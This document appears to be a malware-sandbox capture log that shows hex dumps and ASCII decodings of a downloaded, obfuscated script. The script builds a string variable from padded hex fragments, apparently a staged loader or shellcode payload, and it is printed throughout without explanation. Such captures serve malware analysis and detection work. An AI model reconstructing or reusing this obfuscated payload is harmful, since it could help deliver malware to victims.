                                              2022-05-12 12:01:32 UTC55INData Raw: 4d 61 38 38 36 33 43 37 37 39 58 69 6c 6f 32 32 4d 61 38 38 41 44 43 3a 43 42 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 39 37 43 44 38 45 58 69 6c 6f 32 32 39 42 45 45 43 35 43 58 69 6c 6f 32 32 41 41 41 58 69 6c 6f 32 32 43 39 33 58 69 6c 6f 32 32 45 41 38 4d 61 38 38 38 41 43 41 45 36 33 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61
                                              Data Ascii: Ma8863C779Xilo22Ma88ADC:CBCALLCCMa88C:C597CD8EXilo229BEEC5CXilo22AAAXilo22C93Xilo22EA8Ma888ACAE63Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma
                                              2022-05-12 12:01:32 UTC62INData Raw: 43 41 4c 4c 43 58 69 6c 6f 32 32 38 58 69 6c 6f 32 32 33 4d 61 38 38 43 3a 43 43 3a 43 42 43 3a 43 43 3a 43 38 43 3a 43 4d 61 38 38 43 3a 43 36 39 37 37 43 3a 43 43 3a 43 33 43 41 4c 4c 43 41 4c 4c 43 42 43 41 4c 4c 43 3a 43 32 42 43 37 39 35 43 43 3a 43 35 33 43 41 4c 4c 43 41 4c 4c 43 43 58 69 6c 6f 32 32 32 33 43 38 33 43 41 4c 4c 43 3a 43 33 4d 61 38 38 58 69 6c 6f 32 32 33 45 32 42 43 3a 43 35 38 43 3a 43 37 36 33 42 43 3a 43 35 41 39 33 45 43 41 4c 4c 43 43 4d 61 38 38 42 43 3a 43 58 69 6c 6f 32 32 43 43 3a 43 33 45 45 43 58 69 6c 6f 32 32 43 58 69 6c 6f 32 32 37 44 43 3a 43 35 41 39 33 45 43 41 4c 4c 43 43 4d 61 38 38 36 37 32 36 38 35 4d 61 38 38 36 43 43 3a 43 38 41 58 69 6c 6f 32 32 4d 61 38 38 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 37
                                              Data Ascii: CALLCXilo228Xilo223Ma88C:CC:CBC:CC:C8C:CMa88C:C6977C:CC:C3CALLCALLCBCALLC:C2BC795CC:C53CALLCALLCCXilo2223C83CALLC:C3Ma88Xilo223E2BC:C58C:C763BC:C5A93ECALLCCMa88BC:CXilo22CC:C3EECXilo22CXilo227DC:C5A93ECALLCCMa88672685Ma886CC:C8AXilo22Ma88CXilo22C:C53CALL7
                                              2022-05-12 12:01:32 UTC70INData Raw: 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 58 69 6c 6f 32 32 45 43 43 3a 43 43 3a 43 32 36 41 41 33 33 44 33 43 41 4c 4c 39 39 44 4d 61 38 38 41 33 42 4d 61 38 38 33 43 35 43 44 37 38 33 45 37 4d 61 38 38 43 41 42 32 36 44 58 69 6c 6f 32 32 43 4d 61 38 38 41 32 39 41 32 36 43 3a 43 42 42 33 45 44 4d 61 38 38 43 3a 43 35 35 39 4d 61 38 38 42 4d 61 38 38 58 69 6c 6f 32 32 43 3a 43 43 58 69 6c 6f 32 32 43
                                              Data Ascii: 8Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma88"funktionsk = funktionsk & "63C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863CXilo22ECC:CC:C26AA33D3CALL99DMa88A3BMa883C5CD783E7Ma88CAB26DXilo22CMa88A29A26C:CBB3EDMa88C:C559Ma88BMa88Xilo22C:CCXilo22C
                                              2022-05-12 12:01:32 UTC78INData Raw: 4c 4c 43 41 4c 4c 43 3a 43 41 32 42 33 35 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43
                                              Data Ascii: LLCALLC:CA2B35C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C
                                              2022-05-12 12:01:32 UTC86INData Raw: 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 45 39 43 39 37 44 33 43 41 4c 4c 58 69 6c 6f 32 32 58 69 6c 6f 32 32 36 4d 61 38 38 33 35 42 37 35 33 4d 61 38 38 43 36 43 41 4c 4c 43 41 4c 4c 43 41 4c 4c 43 3a 43 43 3a 43 39 43 41 4c 4c 38 58 69 6c 6f 32 32 42 43 41 4c 4c 45 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 39 37 39 43 35 36 36 32 41 33 37 37 44 44 44 33 4d 61 38 38 38 32 58 69 6c 6f 32 32 35 35 45 41 43 38 37 44 43 41 4c 4c 58 69 6c 6f 32 32 42 36 33 42 39 37 43 45 38 32 44 38 43 32 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 42 44 32 33 43 41 4c 4c 35 41 33 43 41 4c 4c 45 43 45 42 38 43 41 4c 4c 43 43 38 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 41 38 45 45 35 44 43 43 41 4c 4c 4d 61 38 38 33 43 41 4c 4c 32 36 41 38 4d 61 38 38 44 43 41 4c 4c 58 69 6c
                                              Data Ascii: Ma88C:C5CALL38E9C97D3CALLXilo22Xilo226Ma8835B753Ma88C6CALLCALLCALLC:CC:C9CALL8Xilo22BCALLECMa88C:C5CALL3979C5662A377DDD3Ma8882Xilo2255EAC87DCALLXilo22B63B97CE82D8C2C:C53CALL3Ma88BD23CALL5A3CALLECEB8CALLCC8C:C53CALL3Ma88A8EE5DCCALLMa883CALL26A8Ma88DCALLXil
                                              2022-05-12 12:01:32 UTC94INData Raw: 42 32 35 45 43 41 4c 4c 44 42 41 36 36 39 43 41 4c 4c 43 41 4c 4c 32 39 33 41 38 43 41 4c 4c 39 32 37 58 69 6c 6f 32 32 38 32 35 38 39 35 43 3a 43 33 44 32 4d 61 38 38 33 43 4d 61 38 38 39 44 42 44 42 33 37 32 4d 61 38 38 32 43 41 4c 4c 39 45 58 69 6c 6f 32 32 42 37 43 3a 43 58 69 6c 6f 32 32 44 44 39 43 43 3a 43 58 69 6c 6f 32 32 33 44 38 43 41 4c 4c 58 69 6c 6f 32 32 45 43 4d 61 38 38 42 58 69 6c 6f 32 32 35 43 3a 43 58 69 6c 6f 32 32 37 58 69 6c 6f 32 32 58 69 6c 6f 32 32 42 32 36 33 32 58 69 6c 6f 32 32 36 41 41 37 44 43 41 4c 4c 43 3a 43 36 58 69 6c 6f 32 32 36 45 36 39 33 43 32 43 43 41 4c 4c 33 38 44 44 33 43 41 4c 4c 41 36 39 38 4d 61 38 38 4d 61 38 38 44 42 4d 61 38 38 43 41 4c 4c 43 36 38 33 43 41 4c 4c 44 4d 61 38 38 38 33 43 41 4c 4c 43 43 4d
                                              Data Ascii: B25ECALLDBA669CALLCALL293A8CALL927Xilo22825895C:C3D2Ma883CMa889DBDB372Ma882CALL9EXilo22B7C:CXilo22DD9CC:CXilo223D8CALLXilo22ECMa88BXilo225C:CXilo227Xilo22Xilo22B2632Xilo226AA7DCALLC:C6Xilo226E693C2CCALL38DD3CALLA698Ma88Ma88DBMa88CALLC683CALLDMa8883CALLCCM
                                              2022-05-12 12:01:32 UTC101INData Raw: 39 37 37 37 35 36 43 41 4c 4c 33 44 43 41 4c 4c 43 43 4d 61 38 38 33 4d 61 38 38 45 37 39 41 43 3a 43 35 38 36 4d 61 38 38 37 33 45 4d 61 38 38 37 43 3a 43 36 39 44 37 35 36 58 69 6c 6f 32 32 32 39 35 39 37 39 4d 61 38 38 4d 61 38 38 43 43 3a 43 4d 61 38 38 43 37 45 42 4d 61 38 38 43 41 4c 4c 43 32 43 3a 43 39 41 36 39 44 41 58 69 6c 6f 32 32 41 39 41 39 58 69 6c 6f 32 32 32 33 38 36 42 42 42 33 32 33 36 36 37 44 43 41 4c 4c 33 37 45 35 43 41 4c 4c 37 33 36 45 43 58 69 6c 6f 32 32 44 32 37 38 58 69 6c 6f 32 32 32 43 43 3a 43 58 69 6c 6f 32 32 43 3a 43 45 37 35 39 44 32 45 36 33 42 38 33 43 3a 43 58 69 6c 6f 32 32 39 32 45 43 38 38 43 3a 43 42 43 39 33 39 43 4d 61 38 38 43 43 3a 43 43 3a 43 43 43 41 4c 4c 38 36 43 43 41 4c 4c 35 38 39 41 39 43 3a 43 58 69
                                              Data Ascii: 977756CALL3DCALLCCMa883Ma88E79AC:C586Ma8873EMa887C:C69D756Xilo22295979Ma88Ma88CC:CMa88C7EBMa88CALLC2C:C9A69DAXilo22A9A9Xilo222386BBB323667DCALL37E5CALL736ECXilo22D278Xilo222CC:CXilo22C:CE759D2E63B83C:CXilo2292EC88C:CBC939CMa88CC:CC:CCCALL86CCALL589A9C:CXi
                                              2022-05-12 12:01:32 UTC109INData Raw: 44 39 37 38 39 43 4d 61 38 38 43 3a 43 35 42 36 58 69 6c 6f 32 32 37 43 3a 43 39 43 41 4c 4c 4d 61 38 38 35 58 69 6c 6f 32 32 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 42 42 58 69 6c 6f 32 32 41 37 45 45 43 3a 43 42 39 42 43 41 4c 4c 43 3a 43 44 43 43 3a 43 44 58 69 6c 6f 32 32 41 45 36 33 41 41 39 37 37 44 33 36 42 37 37 45 44 58 69 6c 6f 32 32 37 42 43 43 3a 43 43 39 44 44 36 32 33 42 36 4d 61 38 38 37 38 32 45 37 44 43 41 4c 4c 35 43 41 4c 4c 44 33 33 43 45 38 41 39 32 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 37 35 37 35 36 43 3a 43 33 44 43 41 4c 4c 43 43 4d 61 38 38 43 43 45 58 69 6c 6f 32 32 43 43 3a 43 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 33 42 43 3a 43 43 3a 43 39 45 58 69 6c 6f 32 32 43 3a 43 37 33 43 41 4c 4c 43 41 4c 4c 43 43 3a 43 43
                                              Data Ascii: D9789CMa88C:C5B6Xilo227C:C9CALLMa885Xilo22CALLDCMa88C:C5BBXilo22A7EEC:CB9BCALLC:CDCC:CDXilo22AE63AA977D36B77EDXilo227BCC:CC9DD623B6Ma88782E7DCALL5CALLD33CE8A92CXilo22C:C53CALL75756C:C3DCALLCCMa88CCEXilo22CC:CXilo229Xilo223BC:CC:C9EXilo22C:C73CALLCALLCC:CC
                                              2022-05-12 12:01:32 UTC117INData Raw: 41 4c 4c 33 38 45 39 41 43 37 32 42 44 39 42 38 44 37 43 3a 43 42 37 37 35 44 32 39 33 44 43 41 4c 4c 43 43 4d 61 38 38 38 39 43 3a 43 42 43 33 33 43 41 4c 4c 4d 61 38 38 45 43 3a 43 41 58 69 6c 6f 32 32 43 41 4c 4c 43 41 4c 4c 43 41 4c 4c 45 43 43 3a 43 38 4d 61 38 38 44 41 39 36 44 58 69 6c 6f 32 32 33 36 39 43 3a 43 39 43 41 4c 4c 38 43 38 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 39 35 45 43 37 42 43 43 3a 43 43 41 45 36 33 45 43 3a 43 43 3a 43 43 43 4d 61 38 38 39 42 36 36 38 58 69 6c 6f 32 32 33 58 69 6c 6f 32 32 43 35 35 42 58 69 6c 6f 32 32 32 38 37 43 41 4c 4c 39 4d 61 38 38 45 39 41 32 42 43 41 4c 4c 38 39 43 3a 43 41 44 35 43 43 33 4d 61 38 38 39 42 43 3a 43 33 37 41 43 33 38 33 43 44 42 33 43 3a 43 42 43 41 4c 4c 41 37 44 33 37
                                              Data Ascii: ALL38E9AC72BD9B8D7C:CB775D293DCALLCCMa8889C:CBC33CALLMa88EC:CAXilo22CALLCALLCALLECC:C8Ma88DA96DXilo22369C:C9CALL8C8CALLDCMa88C:C5CALL395EC7BCC:CCAE63EC:CC:CCCMa889B668Xilo223Xilo22C55BXilo22287CALL9Ma88E9A2BCALL89C:CAD5CC3Ma889BC:C37AC383CDB3C:CBCALLA7D37
                                              2022-05-12 12:01:32 UTC125INData Raw: 32 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 4d 61 38 38 39 43 44 35 4d 61 38 38 45 45 4d 61 38 38 32 42 43 43 43 41 4c 4c 39 41 41 43 3a 43 42 43 41 4c 4c 4d 61 38 38 42 58 69 6c 6f 32 32 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 43 4d 61 38 38 38 39 43 41 4c 4c 38 38 39 43 3a 43 58 69 6c 6f 32 32 43 41 4c 4c 36 41 38 35 36 44 37 43 3a 43 33 39 43 41 4c 4c 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 42 36 37 36 45 35 41 43 41 4c 4c 38 43 58 69 6c 6f 32 32 37 43 3a 43 35 41 42 43 35 36 39 36 45 35 4d 61 38 38 4d 61 38 38 37 43 4d 61 38 38 44 41 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 4d 61 38 38 4d 61 38 38 43 3a 43 38 39 4d 61 38 38 43 41 4c 4c 32 43 41 4c 4c 33 38 42 35 33 38 44 32 45 44 43 3a 43 45 45 42 41 44 41 37 43 3a 43 58 69 6c
                                              Data Ascii: 2CALLDCMa88C:C5CALL38Ma889CD5Ma88EEMa882BCCCALL9AAC:CBCALLMa88BXilo22CALLDCMa88C:C5CMa8889CALL889C:CXilo22CALL6A856D7C:C39CALLC:C53CALL3Ma88B676E5ACALL8CXilo227C:C5ABC5696E5Ma88Ma887CMa88DACALLDCMa88C:C5Ma88Ma88C:C89Ma88CALL2CALL38B538D2EDC:CEEBADA7C:CXil
                                              2022-05-12 12:01:32 UTC133INData Raw: 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 38 39 43 3a 43 42 35 36 37 37 35 38 38 43 41 4c 4c 35 37 35 41 43 3a 43 33 41 37 45 41 58 69 6c 6f 32 32 45 41 41 43 37 37 41 4d 61 38 38 43 33 58 69 6c 6f 32 32 44 39 42 44 58 69 6c 6f 32 32 41 33 43 41 4c 4c 58 69 6c 6f 32 32 42 4d 61 38 38 43 43 36 35 41 36 41 43 43 44 39 43 33 35 39 33 4d 61 38 38 42 58 69 6c 6f 32 32 42 43 3a 43 43 41 4c 4c 43 33 58 69 6c 6f 32 32 44 38 41 32 42 42 35 45 43 36 42 41 43 3a 43 41 42 38 4d
                                              Data Ascii: 63C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C789C:CB5677588CALL575AC:C3A7EAXilo22EAAC77AMa88C3Xilo22D9BDXilo22A3CALLXilo22BMa88CC65A6ACCD9C3593Ma88BXilo22BC:CCALLC3Xilo22D8A2BB5EC6BAC:CAB8M
                                              2022-05-12 12:01:32 UTC140INData Raw: 43 3a 43 32 37 45 44 35 43 38 33 35 33 45 43 38 43 3a 43 35 43 41 4c 4c 33 39 33 35 33 39 45 36 44 43 41 4c 4c 41 43 41 4c 4c 43 3a 43 35 39 43 41 4c 4c 38 42 37 41 32 44 41 36 32 58 69 6c 6f 32 32 33 58 69 6c 6f 32 32 43 3a 43 36 32 39 45 39 38 37 35 58 69 6c 6f 32 32 33 42 36 36 58 69 6c 6f 32 32 43 33 43 3a 43 37 33 43 41 4c 4c 43 41 4c 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 4c 43 43 3a 43 42 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 42 43 41 4c 4c 43 3a 43 4d 61 38 38 43 32 44 37 37 35 45 45 43 41 4c 4c 4d 61 38 38 58 69 6c 6f 32 32 41 41 35 4d 61 38 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 43 41 4c 4c 32 36 43 41 4c 4c 43 3a 43 36 37 43 3a 43 43 41 43 41 4c 4c 41 36 32 42 33 35 43 41 4c 4c 4d 61 38 38 58
                                              Data Ascii: C:C27ED5C8353EC8C:C5CALL393539E6DCALLACALLC:C59CALL8B7A2DA62Xilo223Xilo22C:C629E9875Xilo223B66Xilo22C3C:C73CALLCAL"funktionsk = funktionsk & "LCC:CBXilo229Xilo22BCALLC:CMa88C2D775EECALLMa88Xilo22AA5Ma88Xilo22Xilo22CALL26CALLC:C67C:CCACALLA62B35CALLMa88X
                                              2022-05-12 12:01:32 UTC148INData Raw: 41 44 44 45 36 43 41 4c 4c 32 45 43 4d 61 38 38 43 32 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 42 37 43 41 4c 4c 43 3a 43 36 42 41 42 4d 61 38 38 43 43 41 4c 4c 44 43 41 4c 4c 39 43 43 43 3a 43 35 39 4d 61 38 38 37 41 45 41 36 58 69 6c 6f 32 32 44 4d 61 38 38 38 4d 61 38 38 38 42 42 44 4d 61 38 38 4d 61 38 38 32 37 45 43 45 42 32 35 43 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 43 3a 43 36 39 44 43 3a 43 43 33 44 36 43 41 4c 4c 32 38 36 45 58 69 6c 6f 32 32 44 43 41 4c 4c 43 43 4d 61 38 38 43 43 42 41 32 43 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 41 39 38 32 45 42 43 3a 43 39 42 38 38 33 58 69 6c 6f 32 32 44 37 38 4d 61 38 38 38 44 58 69 6c 6f 32 32 37 4d 61 38 38 43 41 4c 4c 39 32 41 42 33
                                              Data Ascii: ADDE6CALL2ECMa88C2"funktionsk = funktionsk & "B7CALLC:C6BABMa88CCALLDCALL9CCC:C59Ma887AEA6Xilo22DMa888Ma888BBDMa88Ma8827ECEB25CCMa88C:C53CALLC:C69DC:CC3D6CALL286EXilo22DCALLCCMa88CCBA2CCMa88C:C53CALL3Ma88A982EBC:C9B883Xilo22D78Ma888DXilo227Ma88CALL92AB3
                                              2022-05-12 12:01:32 UTC156INData Raw: 38 38 43 43 45 43 3a 43 43 41 4c 4c 45 4d 61 38 38 43 3a 43 36 35 38 43 3a 43 38 35 35 32 37 45 32 4d 61 38 38 43 32 43 41 4c 4c 41 36 4d 61 38 38 43 3a 43 41 43 3a 43 35 44 36 41 45 45 38 45 37 43 33 43 36 38 43 3a 43 39 33 4d 61 38 38 43 36 36 37 32 38 43 45 42 41 4d 61 38 38 38 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 33 45 43 43 3a 43 43 3a 43 35 43 4d 61 38 38 43 3a 43 39 32 38 43 3a 43 35 33 43 41 4c 4c 43 41 4c 4c 43 33 43 41 4c 4c 43 41 4c 4c 4d 61 38 38 44 43 41 4c 4c 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 39 43 3a 43 33 43 3a 43 43 3a 43 41 43 43 3a 43 39 45 42 43 3a 43 44 4d 61 38 38 44 39 44 41 36 37 43 41 4c 4c 39 41 36 39 39 37 33 33 37 58 69 6c 6f 32 32 39 44 32 44 37 41 44 4d 61 38 38 43 41 4c 4c 43 33 43 4d 61 38 38 43
                                              Data Ascii: 88CCEC:CCALLEMa88C:C658C:C85527E2Ma88C2CALLA6Ma88C:CAC:C5D6AEE8E7C3C68C:C93Ma88C66728CEBAMa888CMa88C:C53CALL3ECC:CC:C5CMa88C:C928C:C53CALLCALLC3CALLCALLMa88DCALLCALLCCMa88C:C5CALL39C:C3C:CC:CACC:C9EBC:CDMa88D9DA67CALL9A6997337Xilo229D2D7ADMa88CALLC3CMa88C
                                              2022-05-12 12:01:32 UTC164INData Raw: 43 42 45 41 58 69 6c 6f 32 32 35 37 42 32 37 33 58 69 6c 6f 32 32 37 45 33 44 43 38 43 3a 43 44 35 37 39 33 37 44 45 38 43 41 4c 4c 4d 61 38 38 38 45 43 3a 43 36 45 35 33 32 4d 61 38 38 58 69 6c 6f 32 32 35 45 58 69 6c 6f 32 32 45 42 43 37 43 41 4c 4c 43 39 36 44 35 4d 61 38 38 43 43 33 4d 61 38 38 4d 61 38 38 36 4d 61 38 38 33 4d 61 38 38 35 36 43 3a 43 4d 61 38 38 44 32 39 43 37 38 42 44 38 32 42 43 3a 43 35 32 43 43 3a 43 45 43 38 38 42 42 36 43 41 4c 4c 41 44 32 33 38 42 41 44 37 32 43 38 43 45 44 33 42 38 33 43 41 4c 4c 4d 61 38 38 36 43 33 43 41 4c 4c 33 39 37 38 42 42 4d 61 38 38 43 41 4c 4c 37 4d 61 38 38 35 33 38 44 41 36 33 43 41 4c 4c 32 33 37 42 43 3a 43 42 38 38 43 43 41 4c 4c 33 43 41 4c 4c 39 37 44 35 37 43 44 37 44 39 44 38 32 38 42 37 38
                                              Data Ascii: CBEAXilo2257B273Xilo227E3DC8C:CD57937DE8CALLMa888EC:C6E532Ma88Xilo225EXilo22EBC7CALLC96D5Ma88CC3Ma88Ma886Ma883Ma8856C:CMa88D29C78BD82BC:C52CC:CEC88BB6CALLAD238BAD72C8CED3B83CALLMa886C3CALL3978BBMa88CALL7Ma88538DA63CALL237BC:CB88CCALL3CALL97D57CD7D9D828B78
                                              2022-05-12 12:01:32 UTC172INData Raw: 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 42 42 32 43 3a 43 41 36 43 43 3a 43 43 4d 61 38 38 37 58 69 6c 6f 32 32 37 38 41 44 37 41 58 69 6c 6f 32 32 44 33 43 41 4c 4c 42 41 43 41 4c 4c 32 43 44 38 45 58 69 6c 6f 32 32 39 41 37 38 32 36 37 37 33 42 58 69 6c 6f 32 32 37 33 39 45 37 33 42 43 41 4c 4c 36 36 42 37 43 3a 43 43 3a 43 42 41 37 4d 61 38 38 33 43 38 4d 61 38 38 33 4d 61 38 38 38 35 33 58 69 6c 6f 32 32 42 44 37 37 4d 61 38 38 33 33 43 3a 43 43 36 36 42 37 33 38 41 43 3a 43 43 33 33 33 32 45 43 39 39 36 33 36 4d 61 38 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 43 41 4c 4c 44 38 44 44 33 38 4d 61 38 38 43 43 41 4c 4c 44 35 33 42 58 69 6c 6f 32 32
                                              Data Ascii: 63C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863BB2C:CA6CC:CCMa887Xilo2278AD7AXilo22D3CALLBACALL2CD8EXilo229A7826773BXilo22739E73BCALL66B7C:CC:CBA7Ma883C8Ma883Ma88853Xilo22BD77Ma8833C:CC66B738AC:CC3332EC99636Ma88Xilo22Xilo22CALLD8DD38Ma88CCALLD53BXilo22
                                              2022-05-12 12:01:32 UTC180INData Raw: 37 43 3a 43 43 3a 43 41 4d 61 38 38 42 43 33 44 43 32 43 43 41 32 35 33 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 43 43 3a 43 58 69 6c 6f 32 32 38 43 43 43 41 4c 4c 43 3a 43 37 39 58 69 6c 6f 32 32 42 58 69 6c 6f 32 32 36 44 43 3a 43 45 4d 61 38 38 45 32 58 69 6c 6f 32 32 45 39 4d 61 38 38 4d 61 38 38 42 41 58 69 6c 6f 32 32 36 4d 61 38 38 36 43 33 42 36 45 37 41 37 37 58 69 6c 6f 32 32 43 3a 43 38 42 32 33 58 69 6c 6f 32 32 44 41 37 36 43 41 4c 4c 42 32 35 45 44 39 39 33 38 32 39 58 69 6c 6f 32 32 43 33 38 38 41 44 37 43 3a 43 39 41 43 3a 43 42 44 38 39 4d 61 38 38 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 35 39 37 44 33 42 43 41 4c 4c 41 45 45 37 37 39 43 36 58 69 6c 6f 32 32 33 33 37 39 58 69 6c 6f 32 32 42 43 43 42 41 44 4d 61 38 38 43 32 43 3a
                                              Data Ascii: 7C:CC:CAMa88BC3DC2CCA253CXilo22C:C53CALLCC:CXilo228CCCALLC:C79Xilo22BXilo226DC:CEMa88E2Xilo22E9Ma88Ma88BAXilo226Ma886C3B6E7A77Xilo22C:C8B23Xilo22DA76CALLB25ED993829Xilo22C388AD7C:C9AC:CBD89Ma88CALLDCMa88C:C5597D3BCALLAEE779C6Xilo223379Xilo22BCCBADMa88C2C:
                                              2022-05-12 12:01:32 UTC187INData Raw: 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 41 36 37 43 43 41 4c 4c 37 37 37 39 43 36 58 69 6c 6f 32 32 33 33 37 37 38 43 3a 43 36 58 69 6c 6f 32 32 32 43 41 4c 4c 43 41 4c 4c 44 58 69 6c 6f 32 32 38 43 43 43 41 4c 4c 39 37 43 33 43 41 42 43 38 32 37 41 36 37 43 45 37 37 35 58 69 6c 6f 32 32 43 41 4c 4c 35 33 32 38 58 69 6c 6f 32 32 37 44 43 33 37 38 39 58 69 6c 6f 32 32 35 35 35 44 36 36 42 45 44 35 37 43 3a 43 4d 61 38 38 37 43 37 35 45 45 43 58 69 6c 6f 32 32 4d 61 38 38 58 69 6c 6f 32 32 41 43 41 4c 4c 58 69 6c 6f 32 32 32 44 32 42 43 3a 43 39 58 69 6c
                                              Data Ascii: C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma88A67CCALL7779C6Xilo2233778C:C6Xilo222CALLCALLDXilo228CCCALL97C3CABC827A67CE775Xilo22CALL5328Xilo227DC3789Xilo22555D66BED57C:CMa887C75EECXilo22Ma88Xilo22ACALLXilo222D2BC:C9Xil
                                              2022-05-12 12:01:32 UTC195INData Raw: 44 4d 61 38 38 39 41 43 3a 43 58 69 6c 6f 32 32 42 45 58 69 6c 6f 32 32 35 58 69 6c 6f 32 32 33 43 43 41 4c 4c 43 4d 61 38 38 43 41 4c 4c 36 42 35 33 43 41 4c 4c 42 41 35 45 33 42 43 3a 43 35 45 45 33 45 43 41 4c 4c 43 43 4d 61 38 38 43 4d 61 38 38 43 3a 43 35 44 37 38 41 43 43 3a 43 38 41 35 37 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 43 43 41 4c 4c 4d 61 38 38 44 37 4d 61 38 38 4d 61 38 38 43 41 4c 4c 37 44 37 35 45 45 33 45 43 41 4c 4c 43 43 4d 61 38 38 33 45 32 42 45 33 43 3a 43 44 41 45 32 35 43 3a 43 39 45 33 35 38 39 38 42 4d 61 38 38 36 32 58 69 6c 6f 32 32 38 43 3a 43 45 4d 61 38 38 43 42 32 45 43 42 43 